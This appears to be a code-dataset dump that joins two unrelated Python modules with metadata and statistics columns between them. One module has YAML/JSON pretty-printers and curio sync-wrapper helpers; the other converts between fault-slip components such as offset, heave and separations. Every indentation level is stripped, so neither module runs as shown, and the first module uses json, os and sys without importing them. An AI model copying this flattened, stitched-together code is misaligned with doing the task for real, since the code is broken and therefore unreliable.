import yaml
import pyaml
import threading
from functools import wraps
from collections import OrderedDict
from pprint import pformat
from pygments import highlight, lexers, formatters
import curio
from curio.meta import (
curio_running, _from_coroutine, _isasyncgenfunction, finalize)
from curio.monitor import Monitor
def load_yaml(stream, Loader=yaml.SafeLoader, object_pairs_hook=OrderedDict, load_doc=False):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, construct_mapping)
if load_doc:
return list(yaml.load_all(stream, OrderedLoader))
return yaml.load(stream, OrderedLoader)
def format_json(obj, sort_keys=True):
return highlight(
json.dumps(obj, sort_keys=sort_keys, indent=2),
lexers.JsonLexer(),
formatters.TerminalFormatter()
)
def format_yaml(obj, prefix='---\n'):
return highlight(
prefix + pyaml.dumps(obj, safe=True).decode('utf-8'),
lexers.YamlLexer(),
formatters.TerminalFormatter()
)
def format_diff(diff):
return highlight(diff, lexers.DiffLexer(), formatters.TerminalFormatter())
def format_python(obj):
return highlight(
pformat(obj),
lexers.PythonLexer(),
formatters.TerminalFormatter()
)
def flatten_kube_lists(items):
for obj in items:
if obj.get('kind', '').endswith('List'):
for obj in flatten_kube_lists(obj['items']):
yield obj
else:
yield obj
_locals = threading.local()
def get_kernel():
try:
return _locals.curio_kernel
except AttributeError:
_locals.curio_kernel = k = curio.Kernel()
if 'CURIOMONITOR' in os.environ:
m = Monitor(k)
k._call_at_shutdown(m.close)
return k
def set_kernel(kernel):
_locals.curio_kernel = kernel
def close_kernel():
try:
k = _locals.curio_kernel
except AttributeError:
return
k.run(shutdown=True)
del _locals.curio_kernel
def sync_wrap(asyncfunc):
if _isasyncgenfunction(asyncfunc):
def _gen(*args, **kwargs):
k = get_kernel()
it = asyncfunc(*args, **kwargs)
f = finalize(it)
sentinal = object()
async def _next():
try:
return await it.__anext__()
except StopAsyncIteration:
return sentinal
k.run(f.__aenter__)
try:
while True:
item = k.run(_next)
if item is sentinal:
return
yield item
finally:
k.run(f.__aexit__, *sys.exc_info())
@wraps(asyncfunc)
def wrapped(*args, **kwargs):
if _from_coroutine() or curio_running():
return asyncfunc(*args, **kwargs)
else:
return _gen(*args, **kwargs)
else:
@wraps(asyncfunc)
def wrapped(*args, **kwargs):
if _from_coroutine() or curio_running():
return asyncfunc(*args, **kwargs)
else:
return get_kernel().run(asyncfunc(*args, **kwargs))
wrapped._awaitable = True
return wrapped
class AsyncInstanceType(curio.meta.AsyncInstanceType):
__call__ = sync_wrap(curio.meta.AsyncInstanceType.__call__)
class AsyncObject(metaclass=AsyncInstanceType):
pass
class SyncIterWrapper:
_sentinel = object()
def __init__(self, aiter):
self._aiter = aiter
@sync_wrap
async def _anext(self):
try:
return await self._aiter.__anext__()
except StopAsyncIteration:
return self._sentinel
def __next__(self):
item = self._anext()
if item is self._sentinel:
raise StopIteration()
return item
class SyncIter:
def __iter__(self):
return SyncIterWrapper(self.__aiter__())
class SyncContextManager:
@sync_wrap
async def __enter__(self):
return await self.__aenter__()
@sync_wrap
async def __exit__(self, typ, val, tb):
return await self.__aexit__(typ, val, tb)
| 25.927461
| 93
| 0.632894
| 948
| 0.189448
| 1,470
| 0.293765
| 818
| 0.163469
| 474
| 0.094724
| 615
| 0.122902
|
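A minimal sketch, not from the source, of how sync_wrap is intended to be used: the decorated coroutine behaves as a normal awaitable inside async code, and transparently runs on the thread-local curio kernel when called from synchronous code. The import path mirrors the file path recorded above and is assumed to be installed.

import curio
from enkube.util import sync_wrap, close_kernel  # assumed importable as packaged above

@sync_wrap
async def add_later(x, y):
    await curio.sleep(0)  # stand-in for real async work
    return x + y

print(add_later(1, 2))  # sync caller: runs on the shared thread-local kernel -> 3

async def caller():
    return await add_later(3, 4)  # async caller: behaves like a plain coroutine

print(curio.run(caller))  # -> 7
close_kernel()  # shut down the thread-local kernel when finished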
b1cf5ce6c13872161132303618fee46973f05973
| 7,588
|
py
|
Python
|
culpable/fault_projections.py
|
cossatot/at_fault
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | 3
|
2019-12-09T05:25:04.000Z
|
2021-04-25T14:55:25.000Z
|
culpable/fault_projections.py
|
cossatot/culpable
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | 9
|
2016-10-11T16:11:42.000Z
|
2017-01-04T21:17:27.000Z
|
culpable/fault_projections.py
|
cossatot/culpable
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy import sin, cos, tan, degrees, radians, arctan, arcsin
# Slip projections
## To/From offset
def offset_from_vert_sep(vert_sep, dip, rake=90.):
dip_slip = dip_slip_from_vert_sep(vert_sep, dip, rake)
return offset_from_dip_slip(dip_slip, dip, rake)
def vert_sep_from_offset(offset, dip, rake=90.):
dip_slip = dip_slip_from_offset(offset, dip, rake)
return vert_sep_from_dip_slip(dip_slip, dip, rake)
def offset_from_hor_sep(hor_sep, dip, rake=90.):
dip_slip = dip_slip_from_hor_sep(hor_sep, dip, rake)
return offset_from_dip_slip(dip_slip, dip, rake)
def hor_sep_from_offset(offset, dip, rake=90.):
dip_slip = dip_slip_from_offset(offset, dip, rake)
return hor_sep_from_dip_slip(dip_slip, dip, rake)
def offset_from_strike_slip(strike_slip, dip, rake=0.):
return strike_slip / cos( radians(rake))
def strike_slip_from_offset(offset, dip, rake=0.):
return offset * cos( radians(rake))
def offset_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip / sin( radians(rake))
def dip_slip_from_offset(offset, dip, rake=90.):
return offset * sin( radians(rake))
def heave_from_offset(offset, dip, rake=90.):
apparent_dip = apparent_dip_from_dip_rake(dip, rake)
return offset * cos( radians(apparent_dip))
def offset_from_heave(heave, dip, rake=90.):
apparent_dip = apparent_dip_from_dip_rake(dip, rake)
return heave / cos( radians(apparent_dip))
## Others
def beta_from_dip_rake(dip, rake):
'''
Returns beta, the angle (in degrees) between the strike and the
trend of apparent dip.
'''
return degrees( arctan( tan(radians(rake)) * cos(radians(dip))))
def apparent_dip_from_dip_rake(dip, rake):
return degrees( arcsin( sin(radians(dip)) * sin(radians(rake))))
def hor_sep_from_vert_sep(vert_sep, dip, rake=90.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def vert_sep_from_hor_sep(hor_sep, dip, rake=90.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def dip_slip_from_vert_sep(vert_sep, dip, rake=90.):
return vert_sep / sin(radians(dip))
def vert_sep_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip * sin(radians(dip))
def strike_slip_from_vert_sep(vert_sep, dip, rake=0.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def vert_sep_from_strike_slip(strike_slip, dip, rake=0.):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def heave_from_vert_sep(vert_sep, dip, rake=90.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return heave_from_offset(offset, dip, rake)
def vert_sep_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def hor_sep_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip * cos(radians(dip))
def dip_slip_from_hor_sep(hor_sep, dip, rake=90.):
return hor_sep / cos(radians(dip))
def hor_sep_from_strike_slip(strike_slip, dip, rake=0.):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def strike_slip_from_hor_sep(hor_sep, dip, rake=0.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def hor_sep_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def heave_from_hor_sep(hor_sep, dip, rake=90.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return heave_from_offset(offset, dip, rake)
def dip_slip_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return dip_slip_from_offset(offset, dip, rake)
def heave_from_dip_slip(dip_slip, dip, rake=90.):
offset = offset_from_dip_slip(dip_slip, dip, rake)
return heave_from_offset(offset, dip, rake)
def dip_slip_from_strike_slip(strike_slip, dip, rake):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return dip_slip_from_offset(offset, dip, rake)
def strike_slip_from_dip_slip(dip_slip, dip, rake):
offset = offset_from_dip_slip(dip_slip, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def heave_from_strike_slip(strike_slip, dip, rake=0.):
hs = hor_sep_from_strike_slip(strike_slip, dip, rake)
return np.sqrt(strike_slip**2 + hs**2)
def strike_slip_from_heave(heave, dip, rake=0.):
offset = offset_from_heave(heave, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
# aggregator functions
def slip_components_from_offset(offset, dip, rake):
slip_comps = {'offset' : offset}
slip_comps['hor_sep'] = hor_sep_from_offset(offset, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_offset(offset, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_offset(offset, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_offset(offset, dip, rake)
slip_comps['heave'] = heave_from_offset(offset, dip, rake)
return slip_comps
def slip_components_from_hor_sep(hor_sep, dip, rake):
slip_comps = {'hor_sep' : hor_sep}
slip_comps['offset'] = offset_from_hor_sep(hor_sep, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_hor_sep(hor_sep, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_hor_sep(hor_sep, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_hor_sep(hor_sep, dip, rake)
slip_comps['heave'] = heave_from_hor_sep(hor_sep, dip, rake)
return slip_comps
def slip_components_from_vert_sep(vert_sep, dip, rake):
slip_comps = {'vert_sep' : vert_sep}
slip_comps['hor_sep'] = hor_sep_from_vert_sep(vert_sep, dip, rake)
slip_comps['offset'] = offset_from_vert_sep(vert_sep, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_vert_sep(vert_sep, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_vert_sep(vert_sep, dip, rake)
slip_comps['heave'] = heave_from_vert_sep(vert_sep, dip, rake)
return slip_comps
def slip_components_from_dip_slip(dip_slip, dip, rake):
slip_comps = {'dip_slip' : dip_slip}
slip_comps['hor_sep'] = hor_sep_from_dip_slip(dip_slip, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_dip_slip(dip_slip, dip, rake)
slip_comps['offset'] = offset_from_dip_slip(dip_slip, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_dip_slip(dip_slip, dip, rake)
slip_comps['heave'] = heave_from_dip_slip(dip_slip, dip, rake)
return slip_comps
def slip_components_from_strike_slip(strike_slip, dip, rake):
slip_comps = {'strike_slip' : strike_slip}
slip_comps['hor_sep'] = hor_sep_from_strike_slip(strike_slip, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_strike_slip(strike_slip, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_strike_slip(strike_slip, dip, rake)
slip_comps['offset'] = offset_from_strike_slip(strike_slip, dip, rake)
slip_comps['heave'] = heave_from_strike_slip(strike_slip, dip, rake)
return slip_comps
def slip_components_from_heave(heave, dip, rake):
slip_comps = {'heave' : heave}
slip_comps['hor_sep'] = hor_sep_from_heave(heave, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_heave(heave, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_heave(heave, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_heave(heave, dip, rake)
slip_comps['offset'] = offset_from_heave(heave, dip, rake)
return slip_comps
| 32.289362
| 78
| 0.741566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.067739
|
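A brief sanity sketch, not part of the module above: for a pure dip-slip event (rake = 90°) on a 30°-dipping fault, 2 m of offset should yield 1 m of vertical separation, since vertical separation = offset · sin(rake) · sin(dip). The import path follows the file path recorded in this entry.

import numpy as np
from culpable.fault_projections import slip_components_from_offset

comps = slip_components_from_offset(offset=2.0, dip=30.0, rake=90.0)
assert np.isclose(comps['dip_slip'], 2.0)                # rake = 90 -> all slip is dip slip
assert np.isclose(comps['vert_sep'], 1.0)                # 2 * sin(90) * sin(30)
assert np.isclose(comps['hor_sep'], 2.0 * np.cos(np.radians(30.0)))
assert np.isclose(comps['strike_slip'], 0.0, atol=1e-12)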